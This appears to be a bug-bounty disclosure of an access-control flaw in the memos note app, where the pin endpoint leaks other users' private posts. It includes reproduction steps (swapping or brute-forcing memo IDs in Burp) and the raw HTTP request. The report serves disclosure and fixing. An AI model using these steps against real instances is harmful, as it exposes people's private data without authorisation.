Description

Due to the privilege escalation issue Low access user can view Admin PRIVATE POST by abusing PIN functionality. PIN functionality is used to pin any post in TOP , by using the Low user Attacker can View the other & high privilege user PRIVATE POST , as per the flow its not PINNING any post in top for other but its disclose the POST DATA in response

Proof of Concept

1. Login to the Account with low privilege user [jack]
2. try to pin any own post
3. capture the request in burp .
4. and replace the  id in request with admin ID or brute force  it , in organizer endpoint    [/api/memo/1032/organizer ]
5. send the request , we can see ADMIN PRIVATE post DATA in response .

poc video:  https://drive.google.com/file/d/1r-JX44Q69czNDXrDs4qXumY-f4NEYUb9/view?usp=share_link

Vulnerable Request:

POST /api/memo/1032/organizer HTTP/2
Host: demo.usememos.com
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json
Content-Length: 15
Referer: https://demo.usememos.com/
Origin: https://demo.usememos.com
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers

{"pinned":true}

POC:

Impact

Attacker can view other high privilege user Admin PRIVATE POST by using PIN functionality